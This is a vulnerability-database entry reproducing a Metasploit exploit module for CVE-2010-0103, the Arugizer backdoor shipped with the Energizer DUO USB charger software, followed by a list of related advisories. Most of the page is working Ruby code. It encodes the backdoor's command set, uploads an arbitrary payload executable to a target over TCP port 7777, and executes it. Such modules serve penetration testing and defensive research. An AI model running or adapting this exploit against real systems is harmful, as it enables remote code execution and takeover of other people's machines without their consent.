Energizer DUO Trojan Code Execution

🗓️ 09 Mar 2010 00:00:00Reported by H D MooreType

packetstorm🔗 packetstormsecurity.com👁 36 Views

Execute arbitrary payload against Energizer DUO Trojan

Reporter	Title	Published	Views	Family All 17
0day.today	Energizer DUO USB Battery Charger Unauthorized Access Vulnerability	18 Mar 201000:00	–	zdt
Tenable Nessus	Trojan/Backdoor - Arugizer Detection	9 Mar 201000:00	–	nessus
Tenable Nessus	Arugizer Backdoor Detection	8 Mar 201000:00	–	nessus
Tenable Nessus	Energizer DUO USB Battery Charger Software Backdoor (credentialed check)	8 Mar 201000:00	–	nessus
Circl	CVE-2010-0103	20 Sep 201000:00	–	circl
Check Point Advisories	Energizer DUO Trojan Code Execution (CVE-2010-0103)	31 Mar 201300:00	–	checkpoint_advisories
CVE	CVE-2010-0103	9 Mar 201019:00	–	cve
Cvelist	CVE-2010-0103	9 Mar 201019:00	–	cvelist
Exploit DB	Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)	20 Sep 201000:00	–	exploitdb
Metasploit	Energizer DUO Trojan Scanner	8 Mar 201019:06	–	metasploit

`##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
require 'msf/core'  
  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::Tcp  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Energizer DUO Trojan Code Execution',  
'Description' => %q{  
This module will execute an arbitrary payload against  
any system infected with the Arugizer trojan horse. This  
backdoor was shipped with the software package accompanying  
the Energizer Duo USB battery charger.  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 8749 $',  
'References' =>  
[  
['CVE', '2010-0103'],  
['URL', 'http://www.kb.cert.org/vuls/id/154421']  
],  
'Platform' => 'win',  
'Targets' =>  
[  
[ 'Automatic', { } ],  
],  
'DefaultTarget' => 0  
))  
  
  
register_options(  
[  
Opt::RPORT(7777),  
], self.class)  
end  
  
def trojan_encode(str)  
str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*")  
end  
  
def trojan_command(cmd)  
cid = ""  
  
case cmd  
when :exec  
cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}"  
when :dir  
cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}"  
when :write  
cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}"  
when :read  
cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}"  
when :nop  
cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}"  
when :find  
cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}"  
when :yes  
cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}"  
when :runonce  
cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}"  
when :delete  
cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"  
end  
  
trojan_encode(  
[cid.length + 1].pack("V") + cid + "\x00"  
)  
end  
  
def exploit  
  
nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00"  
exe = Msf::Util::EXE.to_win32pe(framework,payload.encoded) + "\x00"  
  
  
print_status("Trying to upload #{nam}...")  
connect  
  
# Write file request  
sock.put(trojan_command(:write))  
sock.put(trojan_encode([nam.length].pack("V")))  
sock.put(trojan_encode(nam))  
sock.put(trojan_encode([exe.length].pack("V")))  
sock.put(trojan_encode(exe))  
  
# Required to prevent the server from spinning a loop  
sock.put(trojan_command(:nop))  
  
disconnect  
  
#  
# Execute the payload  
#  
  
print_status("Trying to execute #{nam}...")  
  
connect  
  
# Execute file request  
sock.put(trojan_command(:exec))  
sock.put(trojan_encode([nam.length].pack("V")))  
sock.put(trojan_encode(nam))  
  
# Required to prevent the server from spinning a loop  
sock.put(trojan_command(:nop))  
  
disconnect  
end  
end  
  
`

09 Mar 2010 00:00Current

0.5Low risk

Vulners AI Score0.5

EPSS0.76775